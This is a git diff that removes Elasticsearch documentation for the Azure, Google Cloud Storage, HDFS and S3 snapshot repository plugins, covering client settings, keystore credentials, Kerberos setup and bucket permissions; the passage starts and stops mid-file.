azure.client.default.key -bin/elasticsearch-keystore add azure.client.secondary.account -bin/elasticsearch-keystore add azure.client.secondary.sas_token ----------------------------------------------------------------- - -For more information about these settings, see -<>. - -[IMPORTANT] -.Supported Azure Storage Account types -=============================================== -The Azure Repository plugin works with all Standard storage accounts - -* Standard Locally Redundant Storage - `Standard_LRS` -* Standard Zone-Redundant Storage - `Standard_ZRS` -* Standard Geo-Redundant Storage - `Standard_GRS` -* Standard Read Access Geo-Redundant Storage - `Standard_RAGRS` - -https://azure.microsoft.com/en-gb/documentation/articles/storage-premium-storage[Premium Locally Redundant Storage] (`Premium_LRS`) is **not supported** as it is only usable as VM disk storage, not as general storage. -=============================================== - -[[repository-azure-client-settings]] -==== Client settings - -The client that you use to connect to Azure has a number of settings available. -The settings have the form `azure.client.CLIENT_NAME.SETTING_NAME`. By default, -`azure` repositories use a client named `default`, but this can be modified using -the <> `client`. -For example: - -[source,console] ----- -PUT _snapshot/my_backup -{ - "type": "azure", - "settings": { - "client": "secondary" - } -} ----- -// TEST[skip:we don't have azure setup while testing this] - -Most client settings can be added to the `elasticsearch.yml` configuration file. -For example: - -[source,yaml] ----- -azure.client.default.timeout: 10s -azure.client.default.max_retries: 7 -azure.client.default.endpoint_suffix: core.chinacloudapi.cn -azure.client.secondary.timeout: 30s ----- - -In this example, the client side timeout is `10s` per try for the `default` -account with `7` retries before failing. The endpoint suffix is -`core.chinacloudapi.cn` and `30s` per try for the `secondary` account with `3` -retries. - -The `account`, `key`, and `sas_token` storage settings are reloadable secure -settings, which you add to the {es} keystore. For more information about -creating and updating the {es} keystore, see -{ref}/secure-settings.html[Secure settings]. After you reload the settings, the -internal Azure clients, which are used to transfer the snapshot, utilize the -latest settings from the keystore. - -NOTE: In progress snapshot or restore jobs will not be preempted by a *reload* -of the storage secure settings. They will complete using the client as it was -built when the operation started. - -The following list contains the available client settings. Those that must be -stored in the keystore are marked as "secure"; the other settings belong in the -`elasticsearch.yml` file. - -`account` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - The Azure account name, which is used by the repository's internal Azure client. - -`endpoint_suffix`:: - The Azure endpoint suffix to connect to. The default value is - `core.windows.net`. - -`key` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - The Azure secret key, which is used by the repository's internal Azure client. Alternatively, use `sas_token`. - -`max_retries`:: - The number of retries to use when an Azure request fails. This setting helps - control the exponential backoff policy. It specifies the number of retries - that must occur before the snapshot fails. The default value is `3`. The - initial backoff period is defined by Azure SDK as `30s`. Thus there is `30s` - of wait time before retrying after a first timeout or failure. The maximum - backoff period is defined by Azure SDK as `90s`. - -`proxy.host`:: - The host name of a proxy to connect to Azure through. For example: `azure.client.default.proxy.host: proxy.host`. - -`proxy.port`:: - The port of a proxy to connect to Azure through. For example, `azure.client.default.proxy.port: 8888`. - -`proxy.type`:: - Register a proxy type for the client. Supported values are `direct`, `http`, - and `socks`. For example: `azure.client.default.proxy.type: http`. When - `proxy.type` is set to `http` or `socks`, `proxy.host` and `proxy.port` must - also be provided. The default value is `direct`. - -`sas_token` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - A shared access signatures (SAS) token, which the repository's internal Azure - client uses for authentication. The SAS token must have read (r), write (w), - list (l), and delete (d) permissions for the repository base path and all its - contents. These permissions must be granted for the blob service (b) and apply - to resource types service (s), container (c), and object (o). Alternatively, - use `key`. - -`timeout`:: - The client side timeout for any single request to Azure. The value should - specify the time unit. For example, a value of `5s` specifies a 5 second - timeout. There is no default value, which means that {es} uses the - https://azure.github.io/azure-storage-java/com/microsoft/azure/storage/RequestOptions.html#setTimeoutIntervalInMs(java.lang.Integer)[default value] - set by the Azure client (known as 5 minutes). This setting can be defined - globally, per account, or both. - -[[repository-azure-repository-settings]] -==== Repository settings - -The Azure repository supports following settings: - -`client`:: - - Azure named client to use. Defaults to `default`. - -`container`:: - - Container name. You must create the azure container before creating the repository. - Defaults to `elasticsearch-snapshots`. - -`base_path`:: - - Specifies the path within container to repository data. Defaults to empty - (root directory). - -`chunk_size`:: - - Big files can be broken down into multiple smaller blobs in the blob store during snapshotting. - It is not recommended to change this value from its default unless there is an explicit reason for limiting the - size of blobs in the repository. Setting a value lower than the default can result in an increased number of API - calls to the Azure blob store during snapshot create as well as restore operations compared to using the default - value and thus make both operations slower as well as more costly. - Specify the chunk size as a value and unit, for example: - `10MB`, `5KB`, `500B`. Defaults to the maximum size of a blob in the Azure blob store which is `5TB`. - -`compress`:: - - When set to `true` metadata files are stored in compressed format. This - setting doesn't affect index files that are already compressed by default. - Defaults to `false`. - -include::repository-shared-settings.asciidoc[] - -`location_mode`:: - - `primary_only` or `secondary_only`. Defaults to `primary_only`. Note that if you set it - to `secondary_only`, it will force `readonly` to true. - -Some examples, using scripts: - -[source,console] ----- -# The simplest one -PUT _snapshot/my_backup1 -{ - "type": "azure" -} - -# With some settings -PUT _snapshot/my_backup2 -{ - "type": "azure", - "settings": { - "container": "backup-container", - "base_path": "backups", - "chunk_size": "32MB", - "compress": true - } -} - - -# With two accounts defined in elasticsearch.yml (my_account1 and my_account2) -PUT _snapshot/my_backup3 -{ - "type": "azure", - "settings": { - "client": "secondary" - } -} -PUT _snapshot/my_backup4 -{ - "type": "azure", - "settings": { - "client": "secondary", - "location_mode": "primary_only" - } -} ----- -// TEST[skip:we don't have azure setup while testing this] - -Example using Java: - -[source,java] ----- -client.admin().cluster().preparePutRepository("my_backup_java1") - .setType("azure").setSettings(Settings.builder() - .put(Storage.CONTAINER, "backup-container") - .put(Storage.CHUNK_SIZE, new ByteSizeValue(32, ByteSizeUnit.MB)) - ).get(); ----- - -[[repository-azure-validation]] -==== Repository validation rules - -According to the -https://docs.microsoft.com/en-us/rest/api/storageservices/Naming-and-Referencing-Containers--Blobs--and-Metadata[containers -naming guide], a container name must be a valid DNS name, conforming to the -following naming rules: - -* Container names must start with a letter or number, and can contain only letters, numbers, and the dash (-) character. -* Every dash (-) character must be immediately preceded and followed by a letter or number; consecutive dashes are not -permitted in container names. -* All letters in a container name must be lowercase. -* Container names must be from 3 through 63 characters long. diff --git a/docs/plugins/repository-gcs.asciidoc b/docs/plugins/repository-gcs.asciidoc deleted file mode 100644 index a02a7a2034d..00000000000 --- a/docs/plugins/repository-gcs.asciidoc +++ /dev/null @@ -1,261 +0,0 @@ -[[repository-gcs]] -=== Google Cloud Storage Repository Plugin - -The GCS repository plugin adds support for using the https://cloud.google.com/storage/[Google Cloud Storage] -service as a repository for {ref}/modules-snapshots.html[Snapshot/Restore]. - -:plugin_name: repository-gcs -include::install_remove.asciidoc[] - -[[repository-gcs-usage]] -==== Getting started - -The plugin uses the https://github.com/GoogleCloudPlatform/google-cloud-java/tree/master/google-cloud-clients/google-cloud-storage[Google Cloud Java Client for Storage] -to connect to the Storage service. If you are using -https://cloud.google.com/storage/[Google Cloud Storage] for the first time, you -must connect to the https://console.cloud.google.com/[Google Cloud Platform Console] -and create a new project. After your project is created, you must enable the -Cloud Storage Service for your project. - -[[repository-gcs-creating-bucket]] -===== Creating a Bucket - -The Google Cloud Storage service uses the concept of a -https://cloud.google.com/storage/docs/key-terms[bucket] as a container for all -the data. Buckets are usually created using the -https://console.cloud.google.com/[Google Cloud Platform Console]. The plugin -does not automatically create buckets. - -To create a new bucket: - -1. Connect to the https://console.cloud.google.com/[Google Cloud Platform Console]. -2. Select your project. -3. Go to the https://console.cloud.google.com/storage/browser[Storage Browser]. -4. Click the *Create Bucket* button. -5. Enter the name of the new bucket. -6. Select a storage class. -7. Select a location. -8. Click the *Create* button. - -For more detailed instructions, see the -https://cloud.google.com/storage/docs/quickstart-console#create_a_bucket[Google Cloud documentation]. - -[[repository-gcs-service-authentication]] -===== Service Authentication - -The plugin must authenticate the requests it makes to the Google Cloud Storage -service. It is common for Google client libraries to employ a strategy named https://cloud.google.com/docs/authentication/production#providing_credentials_to_your_application[application default credentials]. -However, that strategy is **not** supported for use with Elasticsearch. The -plugin operates under the Elasticsearch process, which runs with the security -manager enabled. The security manager obstructs the "automatic" credential discovery. -Therefore, you must configure <> -credentials even if you are using an environment that does not normally require -this configuration (such as Compute Engine, Kubernetes Engine or App Engine). - -[[repository-gcs-using-service-account]] -===== Using a Service Account -You have to obtain and provide https://cloud.google.com/iam/docs/overview#service_account[service account credentials] -manually. - -For detailed information about generating JSON service account files, see the https://cloud.google.com/storage/docs/authentication?hl=en#service_accounts[Google Cloud documentation]. -Note that the PKCS12 format is not supported by this plugin. - -Here is a summary of the steps: - -1. Connect to the https://console.cloud.google.com/[Google Cloud Platform Console]. -2. Select your project. -3. Go to the https://console.cloud.google.com/permissions[Permission] tab. -4. Select the https://console.cloud.google.com/permissions/serviceaccounts[Service Accounts] tab. -5. Click *Create service account*. -6. After the account is created, select it and download a JSON key file. - -A JSON service account file looks like this: - -[source,js] ----- -{ - "type": "service_account", - "project_id": "your-project-id", - "private_key_id": "...", - "private_key": "-----BEGIN PRIVATE KEY-----\n...\n-----END PRIVATE KEY-----\n", - "client_email": "service-account-for-your-repository@your-project-id.iam.gserviceaccount.com", - "client_id": "...", - "auth_uri": "https://accounts.google.com/o/oauth2/auth", - "token_uri": "https://accounts.google.com/o/oauth2/token", - "auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs", - "client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/your-bucket@your-project-id.iam.gserviceaccount.com" -} ----- -// NOTCONSOLE - -To provide this file to the plugin, it must be stored in the {ref}/secure-settings.html[Elasticsearch keystore]. You must -add a `file` setting with the name `gcs.client.NAME.credentials_file` using the `add-file` subcommand. - `NAME` is the name of the client configuration for the repository. The implicit client -name is `default`, but a different client name can be specified in the -repository settings with the `client` key. - -NOTE: Passing the file path via the GOOGLE_APPLICATION_CREDENTIALS environment -variable is **not** supported. - -For example, if you added a `gcs.client.my_alternate_client.credentials_file` -setting in the keystore, you can configure a repository to use those credentials -like this: - -[source,console] ----- -PUT _snapshot/my_gcs_repository -{ - "type": "gcs", - "settings": { - "bucket": "my_bucket", - "client": "my_alternate_client" - } -} ----- -// TEST[skip:we don't have gcs setup while testing this] - -The `credentials_file` settings are {ref}/secure-settings.html#reloadable-secure-settings[reloadable]. -After you reload the settings, the internal `gcs` clients, which are used to -transfer the snapshot contents, utilize the latest settings from the keystore. - -NOTE: Snapshot or restore jobs that are in progress are not preempted by a *reload* -of the client's `credentials_file` settings. They complete using the client as -it was built when the operation started. - -[[repository-gcs-client]] -==== Client Settings - -The client used to connect to Google Cloud Storage has a number of settings available. -Client setting names are of the form `gcs.client.CLIENT_NAME.SETTING_NAME` and are specified -inside `elasticsearch.yml`. The default client name looked up by a `gcs` repository is -called `default`, but can be customized with the repository setting `client`. - -For example: - -[source,console] ----- -PUT _snapshot/my_gcs_repository -{ - "type": "gcs", - "settings": { - "bucket": "my_bucket", - "client": "my_alternate_client" - } -} ----- -// TEST[skip:we don't have gcs setup while testing this] - -Some settings are sensitive and must be stored in the -{ref}/secure-settings.html[Elasticsearch keystore]. This is the case for the service account file: - -[source,sh] ----- -bin/elasticsearch-keystore add-file gcs.client.default.credentials_file /path/service-account.json ----- - -The following are the available client settings. Those that must be stored in the keystore -are marked as `Secure`. - -`credentials_file` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - - The service account file that is used to authenticate to the Google Cloud Storage service. - -`endpoint`:: - - The Google Cloud Storage service endpoint to connect to. This will be automatically - determined by the Google Cloud Storage client but can be specified explicitly. - -`connect_timeout`:: - - The timeout to establish a connection to the Google Cloud Storage service. The value should - specify the unit. For example, a value of `5s` specifies a 5 second timeout. The value of `-1` - corresponds to an infinite timeout. The default value is 20 seconds. - -`read_timeout`:: - - The timeout to read data from an established connection. The value should - specify the unit. For example, a value of `5s` specifies a 5 second timeout. The value of `-1` - corresponds to an infinite timeout. The default value is 20 seconds. - -`application_name`:: - - Name used by the client when it uses the Google Cloud Storage service. Setting - a custom name can be useful to authenticate your cluster when requests - statistics are logged in the Google Cloud Platform. Default to `repository-gcs` - -`project_id`:: - - The Google Cloud project id. This will be automatically inferred from the credentials file but - can be specified explicitly. For example, it can be used to switch between projects when the - same credentials are usable for both the production and the development projects. - -[[repository-gcs-repository]] -==== Repository Settings - -The `gcs` repository type supports a number of settings to customize how data -is stored in Google Cloud Storage. - -These can be specified when creating the repository. For example: - -[source,console] ----- -PUT _snapshot/my_gcs_repository -{ - "type": "gcs", - "settings": { - "bucket": "my_other_bucket", - "base_path": "dev" - } -} ----- -// TEST[skip:we don't have gcs set up while testing this] - -The following settings are supported: - -`bucket`:: - - The name of the bucket to be used for snapshots. (Mandatory) - -`client`:: - - The name of the client to use to connect to Google Cloud Storage. - Defaults to `default`. - -`base_path`:: - - Specifies the path within bucket to repository data. Defaults to - the root of the bucket. - -`chunk_size`:: - - Big files can be broken down into multiple smaller blobs in the blob store during snapshotting. - It is not recommended to change this value from its default unless there is an explicit reason for limiting the - size of blobs in the repository. Setting a value lower than the default can result in an increased number of API - calls to the Google Cloud Storage Service during snapshot create as well as restore operations compared to using - the default value and thus make both operations slower as well as more costly. - Specify the chunk size as a value and unit, for example: - `10MB`, `5KB`, `500B`. Defaults to the maximum size of a blob in the Google Cloud Storage Service which is `5TB`. - -`compress`:: - - When set to `true` metadata files are stored in compressed format. This - setting doesn't affect index files that are already compressed by default. - Defaults to `false`. - -include::repository-shared-settings.asciidoc[] - -`application_name`:: - - deprecated:[6.3.0, "This setting is now defined in the <>."] - Name used by the client when it uses the Google Cloud Storage service. - -[[repository-gcs-bucket-permission]] -===== Recommended Bucket Permission - -The service account used to access the bucket must have the "Writer" access to the bucket: - -1. Connect to the https://console.cloud.google.com/[Google Cloud Platform Console]. -2. Select your project. -3. Go to the https://console.cloud.google.com/storage/browser[Storage Browser]. -4. Select the bucket and "Edit bucket permission". -5. The service account must be configured as a "User" with "Writer" access. diff --git a/docs/plugins/repository-hdfs.asciidoc b/docs/plugins/repository-hdfs.asciidoc deleted file mode 100644 index 2dcc2027177..00000000000 --- a/docs/plugins/repository-hdfs.asciidoc +++ /dev/null @@ -1,188 +0,0 @@ -[[repository-hdfs]] -=== Hadoop HDFS Repository Plugin - -The HDFS repository plugin adds support for using HDFS File System as a repository for -{ref}/modules-snapshots.html[Snapshot/Restore]. - -:plugin_name: repository-hdfs -include::install_remove.asciidoc[] - -[[repository-hdfs-usage]] -==== Getting started with HDFS - -The HDFS snapshot/restore plugin is built against the latest Apache Hadoop 2.x (currently 2.7.1). If the distro you are using is not protocol -compatible with Apache Hadoop, consider replacing the Hadoop libraries inside the plugin folder with your own (you might have to adjust the security permissions required). - -Even if Hadoop is already installed on the Elasticsearch nodes, for security reasons, the required libraries need to be placed under the plugin folder. Note that in most cases, if the distro is compatible, one simply needs to configure the repository with the appropriate Hadoop configuration files (see below). - -Windows Users:: -Using Apache Hadoop on Windows is problematic and thus it is not recommended. For those _really_ wanting to use it, make sure you place the elusive `winutils.exe` under the -plugin folder and point `HADOOP_HOME` variable to it; this should minimize the amount of permissions Hadoop requires (though one would still have to add some more). - -[[repository-hdfs-config]] -==== Configuration Properties - -Once installed, define the configuration for the `hdfs` repository through the -{ref}/modules-snapshots.html[REST API]: - -[source,console] ----- -PUT _snapshot/my_hdfs_repository -{ - "type": "hdfs", - "settings": { - "uri": "hdfs://namenode:8020/", - "path": "elasticsearch/repositories/my_hdfs_repository", - "conf.dfs.client.read.shortcircuit": "true" - } -} ----- -// TEST[skip:we don't have hdfs set up while testing this] - -The following settings are supported: - -[horizontal] -`uri`:: - - The uri address for hdfs. ex: "hdfs://:/". (Required) - -`path`:: - - The file path within the filesystem where data is stored/loaded. ex: "path/to/file". (Required) - -`load_defaults`:: - - Whether to load the default Hadoop configuration or not. (Enabled by default) - -`conf.`:: - - Inlined configuration parameter to be added to Hadoop configuration. (Optional) - Only client oriented properties from the hadoop https://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-common/core-default.xml[core] and https://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-hdfs/hdfs-default.xml[hdfs] configuration files will be recognized by the plugin. - -`compress`:: - - Whether to compress the metadata or not. (Disabled by default) - -include::repository-shared-settings.asciidoc[] - -`chunk_size`:: - - Override the chunk size. (Disabled by default) - -`security.principal`:: - - Kerberos principal to use when connecting to a secured HDFS cluster. - If you are using a service principal for your elasticsearch node, you may - use the `_HOST` pattern in the principal name and the plugin will replace - the pattern with the hostname of the node at runtime (see - link:repository-hdfs-security-runtime[Creating the Secure Repository]). - -[[repository-hdfs-availability]] -[discrete] -===== A Note on HDFS Availability -When you initialize a repository, its settings are persisted in the cluster state. When a node comes online, it will -attempt to initialize all repositories for which it has settings. If your cluster has an HDFS repository configured, then -all nodes in the cluster must be able to reach HDFS when starting. If not, then the node will fail to initialize the -repository at start up and the repository will be unusable. If this happens, you will need to remove and re-add the -repository or restart the offending node. - -[[repository-hdfs-security]] -==== Hadoop Security - -The HDFS Repository Plugin integrates seamlessly with Hadoop's authentication model. The following authentication -methods are supported by the plugin: - -[horizontal] -`simple`:: - - Also means "no security" and is enabled by default. Uses information from underlying operating system account - running Elasticsearch to inform Hadoop of the name of the current user. Hadoop makes no attempts to verify this - information. - -`kerberos`:: - - Authenticates to Hadoop through the usage of a Kerberos principal and keytab. Interfacing with HDFS clusters - secured with Kerberos requires a few additional steps to enable (See <> and - <> for more info) - -[[repository-hdfs-security-keytabs]] -[discrete] -===== Principals and Keytabs -Before attempting to connect to a secured HDFS cluster, provision the Kerberos principals and keytabs that the -Elasticsearch nodes will use for authenticating to Kerberos. For maximum security and to avoid tripping up the Kerberos -replay protection, you should create a service principal per node, following the pattern of -`elasticsearch/hostname@REALM`. - -WARNING: In some cases, if the same principal is authenticating from multiple clients at once, services may reject -authentication for those principals under the assumption that they could be replay attacks. If you are running the -plugin in production with multiple nodes you should be using a unique service principal for each node. - -On each Elasticsearch node, place the appropriate keytab file in the node's configuration location under the -`repository-hdfs` directory using the name `krb5.keytab`: - -[source, bash] ----- -$> cd elasticsearch/config -$> ls -elasticsearch.yml jvm.options log4j2.properties repository-hdfs/ scripts/ -$> cd repository-hdfs -$> ls -krb5.keytab ----- -// TEST[skip:this is for demonstration purposes only - -NOTE: Make sure you have the correct keytabs! If you are using a service principal per node (like -`elasticsearch/hostname@REALM`) then each node will need its own unique keytab file for the principal assigned to that -host! - -// Setup at runtime (principal name) -[[repository-hdfs-security-runtime]] -[discrete] -===== Creating the Secure Repository -Once your keytab files are in place and your cluster is started, creating a secured HDFS repository is simple. Just -add the name of the principal that you will be authenticating as in the repository settings under the -`security.principal` option: - -[source,console] ----- -PUT _snapshot/my_hdfs_repository -{ - "type": "hdfs", - "settings": { - "uri": "hdfs://namenode:8020/", - "path": "/user/elasticsearch/repositories/my_hdfs_repository", - "security.principal": "elasticsearch@REALM" - } -} ----- -// TEST[skip:we don't have hdfs set up while testing this] - -If you are using different service principals for each node, you can use the `_HOST` pattern in your principal -name. Elasticsearch will automatically replace the pattern with the hostname of the node at runtime: - -[source,console] ----- -PUT _snapshot/my_hdfs_repository -{ - "type": "hdfs", - "settings": { - "uri": "hdfs://namenode:8020/", - "path": "/user/elasticsearch/repositories/my_hdfs_repository", - "security.principal": "elasticsearch/_HOST@REALM" - } -} ----- -// TEST[skip:we don't have hdfs set up while testing this] - -[[repository-hdfs-security-authorization]] -[discrete] -===== Authorization -Once Elasticsearch is connected and authenticated to HDFS, HDFS will infer a username to use for -authorizing file access for the client. By default, it picks this username from the primary part of -the kerberos principal used to authenticate to the service. For example, in the case of a principal -like `elasticsearch@REALM` or `elasticsearch/hostname@REALM` then the username that HDFS -extracts for file access checks will be `elasticsearch`. - -NOTE: The repository plugin makes no assumptions of what Elasticsearch's principal name is. The main fragment of the -Kerberos principal is not required to be `elasticsearch`. If you have a principal or service name that works better -for you or your organization then feel free to use it instead! diff --git a/docs/plugins/repository-s3.asciidoc b/docs/plugins/repository-s3.asciidoc deleted file mode 100644 index cd893b948be..00000000000 --- a/docs/plugins/repository-s3.asciidoc +++ /dev/null @@ -1,473 +0,0 @@ -[[repository-s3]] -=== S3 Repository Plugin - -The S3 repository plugin adds support for using AWS S3 as a repository for -{ref}/modules-snapshots.html[Snapshot/Restore]. - -*If you are looking for a hosted solution of Elasticsearch on AWS, please visit -https://www.elastic.co/cloud/.* - -:plugin_name: repository-s3 -include::install_remove.asciidoc[] - -[[repository-s3-usage]] -==== Getting Started - -The plugin provides a repository type named `s3` which may be used when creating -a repository. The repository defaults to using -https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html[ECS -IAM Role] or -https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html[EC2 -IAM Role] credentials for authentication. The only mandatory setting is the -bucket name: - -[source,console] ----- -PUT _snapshot/my_s3_repository -{ - "type": "s3", - "settings": { - "bucket": "my-bucket" - } -} ----- -// TEST[skip:we don't have s3 setup while testing this] - -*bucket:* The name of the bucket to be used for snapshots. (Mandatory) -Note that the bucket name can be between 3 and 63 characters long, and can contain only lower-case characters, numbers, periods, and dashes it cannot contain underscores, end with a dash, have consecutive periods, or use dashes adjacent to periods - -The bucket naming convention is outlines in AWS here [https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-s3-bucket-naming-requirements.html] - - - -[[repository-s3-client]] -==== Client Settings - -The client that you use to connect to S3 has a number of settings available. -The settings have the form `s3.client.CLIENT_NAME.SETTING_NAME`. By default, -`s3` repositories use a client named `default`, but this can be modified using -the <> `client`. For example: - -[source,console] ----- -PUT _snapshot/my_s3_repository -{ - "type": "s3", - "settings": { - "bucket": "my-bucket", - "client": "my-alternate-client" - } -} ----- -// TEST[skip:we don't have S3 setup while testing this] - -Most client settings can be added to the `elasticsearch.yml` configuration file -with the exception of the secure settings, which you add to the {es} keystore. -For more information about creating and updating the {es} keystore, see -{ref}/secure-settings.html[Secure settings]. - -For example, if you want to use specific credentials to access S3 then run the -following commands to add these credentials to the keystore: - -[source,sh] ----- -bin/elasticsearch-keystore add s3.client.default.access_key -bin/elasticsearch-keystore add s3.client.default.secret_key -# a session token is optional so the following command may not be needed -bin/elasticsearch-keystore add s3.client.default.session_token ----- - -If instead you want to use the instance role or container role to access S3 -then you should leave these settings unset. You can switch from using specific -credentials back to the default of using the instance role or container role by -removing these settings from the keystore as follows: - -[source,sh] ----- -bin/elasticsearch-keystore remove s3.client.default.access_key -bin/elasticsearch-keystore remove s3.client.default.secret_key -# a session token is optional so the following command may not be needed -bin/elasticsearch-keystore remove s3.client.default.session_token ----- - -*All* client secure settings of this plugin are -{ref}/secure-settings.html#reloadable-secure-settings[reloadable]. After you -reload the settings, the internal `s3` clients, used to transfer the snapshot -contents, will utilize the latest settings from the keystore. Any existing `s3` -repositories, as well as any newly created ones, will pick up the new values -stored in the keystore. - -NOTE: In-progress snapshot/restore tasks will not be preempted by a *reload* of -the client's secure settings. The task will complete using the client as it was -built when the operation started. - -The following list contains the available client settings. Those that must be -stored in the keystore are marked as "secure" and are *reloadable*; the other -settings belong in the `elasticsearch.yml` file. - -`access_key` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - - An S3 access key. If set, the `secret_key` setting must also be specified. - If unset, the client will use the instance or container role instead. - -`secret_key` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - - An S3 secret key. If set, the `access_key` setting must also be specified. - -`session_token` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - - An S3 session token. If set, the `access_key` and `secret_key` settings - must also be specified. - -`endpoint`:: - - The S3 service endpoint to connect to. This defaults to `s3.amazonaws.com` - but the - https://docs.aws.amazon.com/general/latest/gr/rande.html#s3_region[AWS - documentation] lists alternative S3 endpoints. If you are using an - <> then you should - set this to the service's endpoint. - -`protocol`:: - - The protocol to use to connect to S3. Valid values are either `http` or - `https`. Defaults to `https`. - -`proxy.host`:: - - The host name of a proxy to connect to S3 through. - -`proxy.port`:: - - The port of a proxy to connect to S3 through. - -`proxy.username` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - - The username to connect to the `proxy.host` with. - -`proxy.password` ({ref}/secure-settings.html[Secure], {ref}/secure-settings.html#reloadable-secure-settings[reloadable]):: - - The password to connect to the `proxy.host` with. - -`read_timeout`:: - - The socket timeout for connecting to S3. The value should specify the unit. - For example, a value of `5s` specifies a 5 second timeout. The default value - is 50 seconds. - -`max_retries`:: - - The number of retries to use when an S3 request fails. The default value is - `3`. - -`use_throttle_retries`:: - - Whether retries should be throttled (i.e. should back off). Must be `true` - or `false`. Defaults to `true`. - -`path_style_access`:: - - Whether to force the use of the path style access pattern. If `true`, the - path style access pattern will be used. If `false`, the access pattern will - be automatically determined by the AWS Java SDK (See - https://docs.aws.amazon.com/AWSJavaSDK/latest/javadoc/com/amazonaws/services/s3/AmazonS3Builder.html#setPathStyleAccessEnabled-java.lang.Boolean-[AWS - documentation] for details). Defaults to `false`. - -[[repository-s3-path-style-deprecation]] -NOTE: In versions `7.0`, `7.1`, `7.2` and `7.3` all bucket operations used the -https://aws.amazon.com/blogs/aws/amazon-s3-path-deprecation-plan-the-rest-of-the-story/[now-deprecated] -path style access pattern. If your deployment requires the path style access -pattern then you should set this setting to `true` when upgrading. - -`disable_chunked_encoding`:: - - Whether chunked encoding should be disabled or not. If `false`, chunked - encoding is enabled and will be used where appropriate. If `true`, chunked - encoding is disabled and will not be used, which may mean that snapshot - operations consume more resources and take longer to complete. It should - only be set to `true` if you are using a storage service that does not - support chunked encoding. See the - https://docs.aws.amazon.com/AWSJavaSDK/latest/javadoc/com/amazonaws/services/s3/AmazonS3Builder.html#disableChunkedEncoding--[AWS - Java SDK documentation] for details. Defaults to `false`. - -`region`:: - - Allows specifying the signing region to use. Specificing this setting manually should not be necessary for most use cases. Generally, - the SDK will correctly guess the signing region to use. It should be considered an expert level setting to support S3-compatible APIs - that require https://docs.aws.amazon.com/general/latest/gr/signature-version-4.html[v4 signatures] and use a region other than the - default `us-east-1`. Defaults to empty string which means that the SDK will try to automatically determine the correct signing region. - -`signer_override`:: - - Allows specifying the name of the signature algorithm to use for signing requests by the S3 client. Specifying this setting should not - be necessary for most use cases. It should be considered an expert level setting to support S3-compatible APIs that do not support the - signing algorithm that the SDK automatically determines for them. - See the - https://docs.aws.amazon.com/AWSJavaSDK/latest/javadoc/com/amazonaws/ClientConfiguration.html#setSignerOverride-java.lang.String-[AWS - Java SDK documentation] for details. Defaults to empty string which means that no signing algorithm override will be used. - -[discrete] -[[repository-s3-compatible-services]] -===== S3-compatible services - -There are a number of storage systems that provide an S3-compatible API, and -the `repository-s3` plugin allows you to use these systems in place of AWS S3. -To do so, you should set the `s3.client.CLIENT_NAME.endpoint` setting to the -system's endpoint. This setting accepts IP addresses and hostnames and may -include a port. For example, the endpoint may be `172.17.0.2` or -`172.17.0.2:9000`. You may also need to set `s3.client.CLIENT_NAME.protocol` to -`http` if the endpoint does not support HTTPS. - -https://minio.io[Minio] is an example of a storage system that provides an -S3-compatible API. The `repository-s3` plugin allows {es} to work with -Minio-backed repositories as well as repositories stored on AWS S3. Other -S3-compatible storage systems may also work with {es}, but these are not -covered by the {es} test suite. - -Note that some storage systems claim to be S3-compatible without correctly -supporting the full S3 API. The `repository-s3` plugin requires full -compatibility with S3. In particular it must support the same set of API -endpoints, return the same errors in case of failures, and offer a consistency -model no weaker than S3's when accessed concurrently by multiple nodes. If you -wish to use another storage system with the `repository-s3` plugin then you -will need to work with the supplier of the storage system to address any -incompatibilities you encounter. Incompatible error codes and consistency -models may be particularly hard to track down since errors and consistency -failures are usually rare and hard to reproduce. - -[[repository-s3-repository]] -==== Repository Settings - -The `s3` repository type supports a number of settings to customize how data is -stored in S3. These can be specified when creating the repository. For example: - -[source,console] ----- -PUT _snapshot/my_s3_repository -{ - "type": "s3", - "settings": { - "bucket": "my-bucket", - "another_setting": "setting-value" - } -} ----- -// TEST[skip:we don't have S3 set up while testing this] - -The following settings are supported: - -`bucket`:: -(Required) -Name of the S3 bucket to use for snapshots. -+ -The bucket name must adhere to Amazon's -https://docs.aws.amazon.com/AmazonS3/latest/dev/BucketRestrictions.html#bucketnamingrules[S3 -bucket naming rules]. - -`client`:: - - The name of the <> to use to connect to S3. - Defaults to `default`. - -`base_path`:: - - Specifies the path within bucket to repository data. Defaults to value of - `repositories.s3.base_path` or to root directory if not set. Previously, - the base_path could take a leading `/` (forward slash). However, this has - been deprecated and setting the base_path now should omit the leading `/`. - -`chunk_size`:: - - Big files can be broken down into chunks during snapshotting if needed. - Specify the chunk size as a value and unit, for example: - `1GB`, `10MB`, `5KB`, `500B`. Defaults to `1GB`. - -`compress`:: - - When set to `true` metadata files are stored in compressed format. This - setting doesn't affect index files that are already compressed by default. - Defaults to `false`. - -include::repository-shared-settings.asciidoc[] - -`server_side_encryption`:: - - When set to `true` files are encrypted on server side using AES256 - algorithm. Defaults to `false`. - -`buffer_size`:: - - Minimum threshold below which the chunk is uploaded using a single request. - Beyond this threshold, the S3 repository will use the - https://docs.aws.amazon.com/AmazonS3/latest/dev/uploadobjusingmpu.html[AWS - Multipart Upload API] to split the chunk into several parts, each of - `buffer_size` length, and to upload each part in its own request. Note that - setting a buffer size lower than `5mb` is not allowed since it will prevent - the use of the Multipart API and may result in upload errors. It is also not - possible to set a buffer size greater than `5gb` as it is the maximum upload - size allowed by S3. Defaults to the minimum between `100mb` and `5%` of the - heap size. - -`canned_acl`:: - - The S3 repository supports all - 